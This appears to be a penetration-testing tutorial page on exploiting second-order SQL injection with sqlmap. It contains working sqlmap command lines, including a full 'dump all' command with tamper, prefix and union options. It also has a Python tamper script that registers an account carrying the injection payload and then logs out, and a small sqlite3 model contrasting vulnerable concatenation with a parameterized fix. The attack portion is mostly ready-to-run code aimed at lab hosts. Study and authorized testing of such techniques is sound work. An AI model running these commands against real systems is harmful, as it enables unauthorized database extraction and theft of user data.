Second Order Injection - SQLMap


SQLMap can exploit second-order SQL injections. You need to provide:

  • The request where the SQL injection payload is stored

  • The request where the payload is executed

The request where the SQL injection payload is stored is specified the same way as in any other sqlmap injection. The request where sqlmap can read the output/execution of the injection is specified with --second-url, or with --second-req if you need to supply a complete request from a file.

Simple second-order example:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
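To show why two requests are needed, the following self-contained Python/sqlite3 model (an added example, not code from the original page or from sqlmap) mirrors the flow above: the first request stores the email through a bound parameter, and the second request reads the stored value back and splices it into a new query, which is the second-order bug; details_fixed shows the parameterized version. The table, user names and the value used in demo() are constructed for the example.

```python
import sqlite3


def setup_db():
    # Constructed in-memory database standing in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "alice-secret"), ("bob", "bob@example.com", "bob-secret")],
    )
    return conn


def create_account(conn, username, email):
    # First request (create.php in the page's flow): the email is stored through a bound
    # parameter, so this step is not injectable and the payload lands in the table intact.
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (username, email, "new-secret"))


def stored_email(conn, username):
    return conn.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()[0]


def details_vulnerable(conn, username):
    # Second request (details.php): the stored email is read back and concatenated into a
    # new query. It is now trusted as "data from the database", which is the second-order bug.
    query = f"SELECT username, secret FROM users WHERE email = '{stored_email(conn, username)}'"
    return conn.execute(query).fetchall()


def details_fixed(conn, username):
    # Same lookup with the stored value bound as a parameter: it can only match itself,
    # regardless of where the value originally came from.
    return conn.execute(
        "SELECT username, secret FROM users WHERE email = ?", (stored_email(conn, username),)
    ).fetchall()


def demo(payload="x' OR '1'='1"):
    # Constructed attacker-controlled value; returns (vulnerable rows, fixed rows).
    conn = setup_db()
    create_account(conn, "mallory", payload)
    return details_vulnerable(conn, "mallory"), details_fixed(conn, "mallory")
```

The vulnerable lookup returns every row because the stored quote closes the string literal, while the fixed lookup returns only the account whose email is literally that value.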

In some cases this is not enough, because you will need to perform other actions besides sending the payload and accessing a different page.

When this is required, you can use a sqlmap tamper script. For example, the following script registers a new user using the sqlmap payload as the email and then logs out.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def login_account(payload):
    # Route the requests through a local proxy so they can be inspected
    proxies = {'http': 'http://127.0.0.1:8080'}
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

    # Register a new account, using the sqlmap payload as the email field
    params = {"username": "asdasdasd", "email": payload, "password": "11111111"}
    url = "http://10.10.10.10/create.php"
    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

    # Log out so the request in login.txt starts from a clean session
    url = "http://10.10.10.10/exit.php"
    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    login_account(payload)
    # The payload itself is returned unchanged
    return payload

SQLMap tamper scripts are executed before each injection attempt with a payload and must return the payload. In this case we don't care about the payload itself but about sending some requests, so the payload is not modified.

So, if for some reason we need a more complex flow to exploit the second-order SQL injection, such as:

  • Create an account with the SQLi payload inside the "email" field

  • Log out

  • Log in with that account (login.txt)

  • Send the request that executes the SQL injection (second.txt)

this sqlmap line will help:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLi payload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt)
# --second-req second.txt : Request to send to execute the SQLi and get the output
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all